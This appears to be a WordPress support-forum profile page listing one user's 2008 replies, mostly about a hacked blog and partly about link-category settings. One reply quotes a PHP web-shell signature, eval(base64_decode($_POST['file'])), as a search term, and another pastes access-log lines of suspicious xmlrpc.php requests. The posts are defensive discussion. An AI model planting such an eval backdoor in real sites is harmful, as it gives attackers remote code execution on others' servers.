vrocks
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: Hacking ProblemOnce that appears in my logs I have several files with code injected and all of my files are touched to the same date.
http://gordon.dewis.ca/2008/01/06/expunging-the-wordpressnetin-spam-injection-hijack/
Good explanation…
Google for:
eval(base64_decode($_POST[‘file’])); exit;
Apparently XMLRPC is hackable!
Forum: Fixing WordPress
In reply to: Hacking ProblemI keep getting this:
protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:27 -0400] “POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3”
protected.com/logs/access.log:194.110.162.23 – – [24/Mar/2008:01:46:28 -0400] “POST /xmlrpc.php?3e97459f56c3c68f=61e9790d63df6a04 HTTP/1.1” 200 25 “-” “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “http://www.protected.com/page/3” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:38:22 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “http://www.protected.com/page/3” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “http://www.protected.com/page/images/protected.jpg” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:64.136.26.226 – – [24/Mar/2008:02:52:18 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “http://www.protected.com/page/images/protected.jpg” “Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322)”
protected.com/logs/access.log:78.151.173.179 – – [24/Mar/2008:05:51:43 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “http://www.protected.com/” “Dummy/1.00 (Windows NT 5.1; U; en-us)”
protected.com/logs/access.log:78.151.173.179 – – [24/Mar/2008:05:51:46 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “http://www.protected.com/” “Dummy/1.00 (Windows NT 5.1; U; en-us)”
protected.com/logs/access.log:77.91.224.14 – – [24/Mar/2008:06:00:23 -0400] “GET /xmlrpc.php HTTP/1.1” 200 54 “-” “WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)”
protected.com/logs/access.log:77.91.224.14 – – [24/Mar/2008:06:03:01 -0400] “GET /xmlrpc.php?rsd HTTP/1.1” 200 638 “-” “WebAlta Crawler/2.0 (http://www.webalta.net/ru/about_webmaster.html) (Windows; U; Windows NT 5.1; ru-RU)”Forum: Fixing WordPress
In reply to: how to get links out of category listIt seems to me that this should never have happened. The people who actually WANT them included should have had to INCLUDE them!
I thought this was a democracy!
Forum: Fixing WordPress
In reply to: Link Categories mingled up with Post CategoriesSweet, this brainy idea [pause] NOT, has been bugging me too!
Forum: Requests and Feedback
In reply to: Determine WP version via feed pagesI concur.
